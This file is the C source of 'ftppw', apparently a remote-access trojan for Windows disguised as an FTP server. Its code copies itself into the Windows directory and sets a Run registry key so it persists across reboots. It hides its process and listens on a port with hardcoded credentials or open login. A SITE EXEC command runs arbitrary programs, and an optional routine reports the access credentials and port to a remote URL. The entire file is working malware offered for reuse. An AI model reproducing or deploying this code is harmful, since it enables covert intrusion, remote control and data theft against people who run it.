/*
	ftppw 0.1
	coded by evilgoat
	http://wintermarket.org:81/~evilgoat/
	03/11/02 18:38

	if you make modifications to this source please give back to the community
	by sharing your modifications at http://wintermarket.org:81/~evilgoat/cgi-bin/yabb/YaBB.pl?board=source
	or email evilgoat@goats.org.au
*/

#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#include <ctype.h>
#include "includes.h"
#ifdef WITHCGINOTIFY
#include <wininet.h>
#endif


int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInst, LPSTR lpCmdLine, int nCmdShow) {
	struct sockaddr_in listen_sin;
	char *fbuf;
#ifdef WITHCGINOTIFY
    DWORD tid;
#endif
	WSADATA ws;
	int listen_sock, listen_sock_len;
	int ret;

#ifdef CONSOLE_OUT
	con_setup();
#endif

	WSAStartup(0x101, &ws);
	reg_ser_proc();

    fbuf = (char *)malloc(MAX_PATH+1);
    GetModuleFileName(NULL, fbuf, MAX_PATH+1);
    opt_read(fbuf);
    srv_copy_to_target(opt.opt_filename, parse_dir(opt.opt_target), fbuf);   
    srv_reg_add(opt.opt_regkey, fbuf);
    free(fbuf);

	listen_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (listen_sock == -1) {
#ifdef CONSOLE_OUT
		con_out("winmain(): socket() failed\n");
#endif
	}

	listen_sin.sin_family = AF_INET;
	listen_sin.sin_port = htons(atoi(opt.opt_port));
	#ifndef CONSOLE_OUT
	listen_sin.sin_addr.s_addr = LISTEN_ADDR;
	#else
	listen_sin.sin_addr.s_addr = inet_addr("192.168.0.1");
 	#endif
	listen_sock_len = sizeof(listen_sin);
	ret = bind(listen_sock, (struct sockaddr *)&listen_sin, listen_sock_len);
	if (ret == -1) {
#ifdef CONSOLE_OUT
		con_out("winmain(): bind() failed\n");
#endif
		return -1;
	}

	ret = listen(listen_sock, SOMAXCONN);
	if (ret == -1) {
#ifdef CONSOLE_OUT
		con_out("winmain(): listen() failed\n");
#endif
		return -1;
	}

#ifdef WITHCGINOTIFY
    if (opt.opt_cgiurl[0] != 0)
        CreateThread(0, 0, srv_cginotify_t, 0, 0, &tid);
#endif

	while (1) {
		long id;
		int cli_sock;
		cli_sock = accept(listen_sock, 0, 0);
		CreateThread(0, 0, ftp_parse_t, &cli_sock, 0, &id);
		Sleep(1000);
	}
	while (1);
	return 0;
}

DWORD WINAPI ftp_parse_t(void *p) {
	int cli_sock, cli_sin_len, pasv_sock, data_sock;
	struct sockaddr_in cli_sin;
 	struct sockaddr_in pasv_sin, pasv_sin1, data_sin;
 	char buffer[BUFFERSIZE];
	int ret, loggedin, len;
 	long filepos;
	char cwd[MAX_PATH+1], drive[32];
   	char filename[MAX_PATH+1], olddir[MAX_PATH+1];

	cli_sock = *(SOCKET *)p;

	filepos = 0;
	loggedin = FALSE;

	strcpy(drive, "C:");
	strcpy(cwd, "/");
	sprintf(filename, "%s%s", drive, cwd);
	setcwd(cwd, drive, filename);

	cli_sin_len = sizeof(struct sockaddr_in);
	getpeername(cli_sock, (struct sockaddr *)&cli_sin, &cli_sin_len);
#ifdef CONSOLE_OUT
	con_out("ftp_parse_t(): incoming connection from %s:%d\n", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));
#endif

	pasv_sock = INVALID_SOCKET;
	data_sin = cli_sin;
	data_sin.sin_port = ntohs(data_sin.sin_port - 1);

	ret = sizeof(struct sockaddr_in);
	getsockname(cli_sock, (struct sockaddr *)&pasv_sin, &ret);

	net_send(cli_sock, "220 %s\r\n", FTP_NAME);

	while (1) {
		char *cmd, *ptr;
		char username[32], password[32];

		memset(buffer, 0, BUFFERSIZE);
		ret = net_read(cli_sock, buffer, BUFFERSIZE);
		if ((ret == -1) || (ret == 0))
			return -1;

		cmd = buffer;
		while (*cmd && *cmd < ' ')
			cmd++;

		if (!*cmd)
			continue;

		if (!strnicmp(cmd, "USER ", 5)) {
			ptr = cmd+5;
			NEXTWORD(ptr);
			strcpy(username, ptr);
#ifdef CONSOLE_OUT
			con_out("ftp_parse_t(): username = %s\n", username);
#endif
			net_send(cli_sock, "331 Password required for %s.\r\n", username);
		} else if (!strnicmp(cmd, "PASS ", 5)) {
			ptr=cmd+5;
			NEXTWORD(ptr);
			strcpy(password, ptr);
#ifdef CONSOLE_OUT
			con_out("ftp_parse_t(): password = %s\n", password);
#endif
			if (opt.opt_open) {
				net_send(cli_sock, "230 User %s logged in.\r\n", username);
				loggedin = 1;
			} else if (!opt.opt_open) {
   				if (!strcmp(username, opt.opt_user) && !strcmp(password, opt.opt_pass)) {
  					net_send(cli_sock, "230 User %s logged in.\r\n", username);
  					loggedin = 1;
  				} else {
 					net_send(cli_sock, "530 Login incorrect.\r\n");
 					loggedin = 0;
			    }
			}
		} else if (!strnicmp(cmd, "SYST", 4) && loggedin) {
			net_send(cli_sock, "215 UNIX Type: L8\r\n");
		} else if (!strnicmp(cmd, "PASV", 4) && loggedin) {
			unsigned long ipaddr, port;
			if (pasv_sock != -1)
				net_close(pasv_sock);

			pasv_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
			if (pasv_sock == -1) {
#ifdef CONSOLE_OUT
				con_out("ftp_parse_t(): (%04d) error creating pasv_sock\n", cli_sock);
#endif
				net_send(cli_sock, "425 Can't open data connection.\r\n");
				net_close(pasv_sock);
				continue;
			}
			pasv_sin.sin_port = 0;
			ret = bind(pasv_sock, (struct sockaddr *)&pasv_sin, sizeof(pasv_sin));
			if (ret == -1) {
#ifdef CONSOLE_OUT
				con_out("ftp_parse_t(): (%04d) error binding data socket\n", cli_sock);
#endif
				net_send(cli_sock, "425 Can't open data connection.\r\n");
				net_close(pasv_sock);
				continue;
			}
                len = sizeof(pasv_sin1);
                ret = getsockname(pasv_sock, (struct sockaddr *)&pasv_sin1, &len);
                if (ret != 0) {
#ifdef CONSOLE_OUT
                    con_out("srv_conn_t(): %04d error getting address/port\n", cli_sock);
#endif
                    net_send(cli_sock, "425 error gettign address/port\r\n");
                    net_close(pasv_sock);
                    continue;
                }

                ret = listen(pasv_sock, 1);
                if (ret != 0) {
#ifdef CONSOLE_OUT
                    con_out("srv_conn_t(): %04d error listening on data socket\n", cli_sock);
#endif
                    net_send(cli_sock, "425 error listening on data socket\r\n");
                    net_close(pasv_sock);
                    continue;
                }

            ipaddr = ntohl(pasv_sin.sin_addr.s_addr);
            port = ntohs(pasv_sin1.sin_port);
            net_send(cli_sock, "227 Entering Passive Mode (%d,%d,%d,%d,%hd,%hd)\r\n", (ipaddr>>24)&0xff, (ipaddr>>16)&0xff, (ipaddr>>8)&0xff, ipaddr&0xff, (port>>8)&0xff, port&0xff);
        } else if (!strnicmp(cmd, "PORT ", 5) && loggedin) {
        	DWORD h1,h2,h3,h4;
		    unsigned short p1,p2;
		    ptr=cmd+5;
            NEXTWORD(ptr);
            sscanf(ptr, "%ld,%ld,%ld,%ld,%hd,%hd", &h1, &h2, &h3, &h4, &p1, &p2);
            data_sin.sin_addr.s_addr = htonl((h1<<24)|(h2<<16)|(h3<<8)|h4);
            data_sin.sin_port = (u_short)((p1<<8)|p2);
            data_sin.sin_port = htons(data_sin.sin_port);
            net_send(cli_sock, "200 PORT command succesful\r\n");
            continue;
        } else if ((!strnicmp(cmd, "LIST", 4) || (!strnicmp(cmd, "NLST", 4))) && loggedin) {
        	struct xfer_s *xfs;
        	char tmppath[128];
        	ptr=cmd+4;
        	NEXTWORD(ptr);
        	GetTempPath(128, tmppath);
        	sprintf(filename, "%s\\tmp.%04d", tmppath, cli_sock);
#ifdef CONSOLE_OUT
			con_out("%s\n", ptr);
#endif
        	net_send(cli_sock, "150 Directory Listing of \"%s\"\r\n", getcwd(cwd, drive));
        	getdir(cwd, drive, ptr, filename, !strncmp(cmd, "LIST", 4) ? TRUE : FALSE);
			xfs = (void*)malloc(sizeof(struct xfer_s));
			xfs->ctrl_sock = cli_sock;
			xfs->data_sock = &data_sock;
			xfs->pasv_sock = pasv_sock;
			xfs->tmpfile = TRUE;
			xfs->filepos = 0;
			strcpy(xfs->filename, filename);
			xfs->sending = TRUE;
			strcpy(xfs->cwd, cwd);
			net_xfer_file(&data_sin, xfs);
       	} else if (!strnicmp(cmd, "SIZE ", 5) && loggedin) {
       		ptr=cmd+5;
       		NEXTWORD(ptr);
       		ret = getfilesize(ptr, cwd);
       		if (ret != -1) {
       			net_send(cli_sock, "213 %d\r\n", ret);
       		} else {
       			net_send(cli_sock, "550 %s: No such file or directory.\r\n", ptr);
       		}
        } else if (!strnicmp(cmd, "RETR ", 5) && loggedin) {
        	struct xfer_s *xfs;
        	ptr=cmd+5;
        	NEXTWORD(ptr);
       		fronttoback(ptr);
#ifdef CONSOLE_OUT
       		con_out("%s\n", ptr);
#endif
       		ret = getfilesize(ptr, cwd);
       		if (ret != -1) {
       			net_send(cli_sock, "150 Opening BINARY mode data connection for file transfer.\r\n");
				xfs = (void*)malloc(sizeof(struct xfer_s));
				xfs->ctrl_sock = cli_sock;
				xfs->data_sock = &data_sock;
				xfs->pasv_sock = pasv_sock;
				xfs->tmpfile = FALSE;
				xfs->filepos = filepos;
				strcpy(xfs->filename, ptr);
				xfs->sending = TRUE;
				strcpy(xfs->cwd, cwd);
				net_xfer_file(&data_sin, xfs);
       		} else {
       			net_send(cli_sock, "550 %s: No such file or directory.\r\n", ptr);
       		}
       		filepos = 0;
        } else if (!strnicmp(cmd, "STOR ", 5) && loggedin) {
        	struct xfer_s *xfs;
        	ptr=cmd+5;
        	NEXTWORD(ptr);
       		net_send(cli_sock, "150 Opening BINARY mode data connection for file transfer.\r\n");
			xfs = (void*)malloc(sizeof(struct xfer_s));
			xfs->ctrl_sock = cli_sock;
			xfs->data_sock = &data_sock;
			xfs->pasv_sock = pasv_sock;
			xfs->tmpfile = FALSE;
			xfs->filepos = filepos;
			strcpy(xfs->filename, ptr);
			xfs->sending = FALSE;
			strcpy(xfs->cwd, cwd);
			net_xfer_file(&data_sin, xfs);
       		filepos = 0;
      } else if (!strnicmp(cmd, "APPE ", 5) && loggedin) {
        	struct xfer_s *xfs;
        	ptr=cmd+5;
        	NEXTWORD(ptr);
       		ret = getfilesize(ptr, cwd);
       		net_send(cli_sock, "150 Opening BINARY mode data connection for file transfer.\r\n");
			xfs = (void*)malloc(sizeof(struct xfer_s));
			xfs->ctrl_sock = cli_sock;
			xfs->data_sock = &data_sock;
			xfs->pasv_sock = pasv_sock;
			xfs->tmpfile = FALSE;
			xfs->filepos = ret > 0 ? ret : 0L;
			strcpy(xfs->filename, ptr);
			xfs->sending = FALSE;
			strcpy(xfs->cwd, cwd);
			net_xfer_file(&data_sin, xfs);
      } else if (!strnicmp(cmd, "DELE ", 5) && loggedin) {
        	ptr=cmd+5;
        	NEXTWORD(ptr);
        	fronttoback(ptr);
       		ret = getfilesize(ptr, cwd);
       		if (ret == -1) {
       			net_send(cli_sock, "550 %s: No such file or directory.\r\n", ptr);
       			continue;
       		}
       		GetCurrentDirectory(MAX_PATH, olddir);
       		SetCurrentDirectory(cwd);
        	if (DeleteFile(ptr)) {
        		net_send(cli_sock, "250 File deleted.\r\n");
        	} else {
        	   	net_send(cli_sock, "450 Failed.\r\n");
        	}
       		SetCurrentDirectory(olddir);
        } else if (!strnicmp(cmd, "MODE ", 5) && loggedin) {
            ptr = cmd+5;
            NEXTWORD(ptr);
            if(toupper(*ptr)!='S')
                net_send(cli_sock, "504 Only STREAM mode supported\r\n");
            else
                net_send(cli_sock, "200 STREAM mode\r\n");
        } else if (!strnicmp(cmd, "PWD", 3) && loggedin) {
        	net_send(cli_sock, "257 \"%s\" is current directory.\r\n", getcwd(cwd, drive));
   		} else if (!strnicmp(cmd, "CWD ", 4) && loggedin) {
   			ptr=cmd+4;
      		NEXTWORD(ptr);
      		if (setcwd(cwd, drive, ptr) == 0) {
      			net_send(cli_sock, "250 CWD command successful.\r\n");
      		} else {
      			net_send(cli_sock, "550 No such file or directory.\r\n");
      		}
   		} else if (!strnicmp(cmd, "CDUP", 4) && loggedin) {
   			char dotdot[] = "..";
      		if (setcwd(cwd, drive, dotdot) == 0) {
      			net_send(cli_sock, "250 CWD command successful.\r\n");
      		} else {
      			net_send(cli_sock, "550 No such file or directory.\r\n");
      		}
   		} else if (!strnicmp(cmd, "REST ", 5) && loggedin) {
   			ptr=cmd+5;
   			NEXTWORD(ptr);
   			filepos = atoi(ptr);
   			net_send(cli_sock, "350 Restarting at %d. Send STORE or RETRIEVE to initiate transfer.\r\n", filepos);
   		} else if (!strnicmp(cmd, "STRU ", 5) && loggedin) {
   			ptr=cmd+5;
      		NEXTWORD(ptr);
      		if (toupper(*ptr)!='F') {
      			net_send(cli_sock, "504 Only FILE structure supported.\r\n");
        	} else {
        		net_send(cli_sock, "200 FILE structure.\r\n");
        	}
       	} else if (!strnicmp(cmd, "ABOR", 4) && loggedin) {
			net_send(cli_sock, "226 Transfer aborted.\r\n");
			net_close(data_sock);
        } else if (!strnicmp(cmd, "RMD ", 4) && loggedin) {
        	ptr = cmd+3;
            NEXTWORD(ptr);
            fronttoback(ptr);
            GetCurrentDirectory(MAX_PATH, olddir);
           	SetCurrentDirectory(cwd);
            ret = RemoveDirectory(ptr);
            if (ret != 0)
            	net_send(cli_sock, "250 RMD command successful.\r\n");
            else
            	net_send(cli_sock, "550 %s: No such file or directory.\r\n", ptr);
       		SetCurrentDirectory(olddir);
        } else if (!strnicmp(cmd, "RNFR ", 5) && loggedin) {
      		ptr=cmd+5;
      		NEXTWORD(ptr);
      		if (getfilesize(ptr, cwd) != -1)
      			net_send(cli_sock, "350 File exists, ready for destination name\r\n");
      		else
      			net_send(cli_sock, "550 %s: File doesnt exist.\r\n", ptr);
			strcpy(filename, ptr);
        } else if (!strnicmp(cmd, "RNTO ", 5) && loggedin) {
       		GetCurrentDirectory(MAX_PATH, olddir);
      		SetCurrentDirectory(cwd);
      		ptr=cmd+5;
      		NEXTWORD(ptr);
      		fronttoback(filename);
      		fronttoback(ptr);
      		if (MoveFile(filename, ptr) != 0) {
      			net_send(cli_sock, "250 Rename successful.\r\n");
      		} else {
      			net_send(cli_sock, "450 Rename failed.\r\n");
      		}
      		SetCurrentDirectory(olddir);
        } else if (!strnicmp(cmd, "MKD ", 4) && loggedin) {
            ptr = cmd+3;
            NEXTWORD(ptr);
            fronttoback(ptr);
            GetCurrentDirectory(MAX_PATH, olddir);
            SetCurrentDirectory(cwd);
            ret = CreateDirectory(ptr, NULL);
            if (ret != 0)
            	net_send(cli_sock, "257 MKD command successful.\r\n");
            else
                net_send(cli_sock, "550 %s: File exists.\r\n", ptr);
            SetCurrentDirectory(olddir);                
        } else if (!strnicmp(cmd, "QUIT", 4)) {
        	net_send(cli_sock, "221 Goodbye.\r\n");
        	net_close(cli_sock);
        	break;
       	} else if (!strnicmp(cmd, "SITE ", 5) && loggedin) {
       		ptr=cmd+5;
       		NEXTWORD(ptr);
       		if (!strnicmp(ptr, "EXEC ", 5)) {
       			STARTUPINFO sif;
       			PROCESS_INFORMATION pif;
       			ptr=cmd+10;
       			GetCurrentDirectory(MAX_PATH, olddir);
       			SetCurrentDirectory(cwd);
       			memset(&sif, 0, sizeof(STARTUPINFO));
       			sif.cb = sizeof(STARTUPINFO);
       			sif.lpReserved = NULL;
       			ret = CreateProcess(ptr, NULL, NULL, NULL, 0, 0, NULL, cwd, &sif, &pif);
       	       	if (ret != 0) {		
       	       		net_send(cli_sock, "200 File executed.\r\n");
	       		} else {
	       			net_send(cli_sock, "550 Execute failed.\r\n");
	       		}
       			SetCurrentDirectory(olddir);
       		}
       		if (!strnicmp(ptr, "SRVCLOSE", 8)) {
       			ExitProcess(1);
       		}
       		if (!strnicmp(ptr, "SRVREMOVE", 9)) {
       			srv_reg_rem(opt.opt_regkey);
       			ExitProcess(2);
       		}
		} else if (!strnicmp(cmd, "NOOP", 4)) {
			net_send(cli_sock, "200 NOOP command successful.\r\n");
        } else if (!strnicmp(cmd, "TYPE ", 5) && loggedin) {
            net_send(cli_sock, "200 All files sent in BINARY mode.\r\n");
		} else if (!loggedin) {
			net_send(cli_sock, "530 Please login with USER and PASS.\r\n");
		} else if (loggedin) {
			net_send(cli_sock, "500 '%s': command not understood.\r\n", cmd);
		}
	}
	return 0;
}

int reg_ser_proc() {
    HANDLE hDll;
    RP pRegisterServiceProcess;
    int ret = 0;

    hDll = LoadLibrary("KERNEL32.DLL");
    if (hDll == NULL) {
#ifdef CONSOLE_OUT
        con_out("reg_ser_proc(): couldnt load kernel32.dll\n");
#endif
        return -1;
    }

	pRegisterServiceProcess = (RP)GetProcAddress(hDll, "RegisterServiceProcess");
	if (pRegisterServiceProcess == NULL) {
#ifdef CONSOLE_OUT
        con_out("reg_ser_proc(): GetProcAddress returned NULL\n");
#endif
        return -1;
	}
	ret = pRegisterServiceProcess(GetCurrentProcessId(), 1);
	FreeLibrary(hDll);
	return ret;
}

char *parse_dir(char *dir) {
    char *out;
    int ret = 0;
    out = (char *)malloc(MAX_PATH+1);
    
    if (!strnicmp(dir, "%%WINDIR%%", 10)) {
        ret = GetWindowsDirectory(out, MAX_PATH+1);
#ifdef CONSOLE_OUT
        con_out("parse_dir(): GetWindowsDirectory() returned %d, str: %s\n", ret, out);
#endif                            
        if (ret == 0) return NULL;
    } else if (!strnicmp(dir, "%%SYSDIR%%", 10)) {
        ret = GetSystemDirectory(out, MAX_PATH+1);
#ifdef CONSOLE_OUT
        con_out("parse_dir(): GetSystemDirectory() returned %d, str: %s\n", ret, out);
#endif
        if (ret == 0) return NULL;
    } else {
        strncpy(out, dir, strlen(dir));
#ifdef CONSOLE_OUT
        con_out("parse_dir(): out = %s, dir = %s\n", out, dir);        
#endif
    }
    return out;
}


int opt_read(char *filename) {
    HANDLE hFile;
    DWORD size, read;
    
    hFile = CreateFile(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
#ifdef CONSOLE_OUT
        con_out("opt_read(): couldnt open file %s\n", filename);
#endif
        return -1;
    }
    
    size = GetFileSize(hFile, NULL);
#ifdef CONSOLE_OUT
    con_out("opt_read(): file size = %d\n", size);
#endif
    if (size == INVALID_FILE_SIZE)
        return -1;
        
    SetFilePointer(hFile, (size - sizeof(struct opt_s)), NULL, FILE_BEGIN);
    ReadFile(hFile, &opt, sizeof(struct opt_s), &read, NULL);
    
    if ((opt.opt_magic[0] != 'E') && (opt.opt_magic[1] != 'G')) {
#ifdef CONSOLE_OUT
        con_out("opt_read(): no magic, using default\n");
#endif
        strcpy(opt.opt_magic, "EG");
        strcpy(opt.opt_port, "13014");
        strcpy(opt.opt_filename, "ftpsvr.exe");
        strcpy(opt.opt_target, "%%WINDIR%%");
        strcpy(opt.opt_user, "evilgoat");
        strcpy(opt.opt_pass, "penix");
        strcpy(opt.opt_regkey, "ftpsvr");
        memset(opt.opt_cgiurl, 0, 128);
        opt.opt_open = FALSE;
    }
    
#ifdef CONSOLE_OUT
    con_out("opt_read(): magic = %s, port = %s, filename = %s, target = %s, user = %s, pass = %s, regkey = %s, open = %d\n", 
    opt.opt_magic, opt.opt_port, opt.opt_filename, opt.opt_target, opt.opt_user, opt.opt_pass, opt.opt_regkey, opt.opt_open);
#endif
       
    CloseHandle(hFile);
    return 0;
}

int srv_copy_to_target(char *filename, char *target, char *thisfile) {
    char buf[MAX_PATH];
    sprintf(buf, "%s\\%s", target, filename);
#ifdef CONSOLE_OUT
    con_out("srv_copy_to_target(): buf = %s, thisfile = %s\n", buf, thisfile);
#endif

    if (stricmp(buf, thisfile)) {
        CopyFile(thisfile, buf, FALSE);
        WinExec(buf, SW_SHOWNORMAL);
        ExitProcess(1);
    }

    return 0;
}

int srv_reg_add(char *key, char *filename) {
    HKEY hkey;
    int ret;
    
    ret = RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hkey, NULL);
    if (ret != ERROR_SUCCESS) {
#ifdef CONSOLE_OUT
        con_out("srv_reg_add(): regcreatekey failed\n");
#endif
        return -1;
    }

	RegSetValueEx(hkey, key, 0, REG_SZ, (const unsigned char *)filename, strlen(filename));

	RegCloseKey(hkey);    
	return 0;
}

int srv_reg_rem(char *key) {
	HKEY hkey;

	RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &hkey);
	RegDeleteValue(hkey, key);
	RegCloseKey(hkey);

    return 0;
}

#ifdef WITHCGINOTIFY
DWORD WINAPI srv_cginotify_t(void *p) {
    HINTERNET hIn, hUrl;
    char buffer[256];
    sprintf(buffer, "%s?username=%s&password=%s&port=%s&product=ftppw", opt.opt_cgiurl, opt.opt_user, opt.opt_pass, opt.opt_port);
#ifdef CONSOLE_OUT
    con_out("srv_cginotify_t(): complete url %s\n", buffer);
#endif
    hIn = InternetOpen("Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (hIn == 0)
    	return -1;
   	hUrl = InternetOpenUrl(hIn, buffer, NULL, 0, INTERNET_FLAG_RELOAD, 0);
   	if (hUrl != 0) {
#ifdef CONSOLE_OUT
	    con_out("srv_cginotify_t(): url visited\n", buffer);
#endif  	
   	}
   	InternetCloseHandle(hUrl);
   	InternetCloseHandle(hIn);
   	return 0;
}
#endif
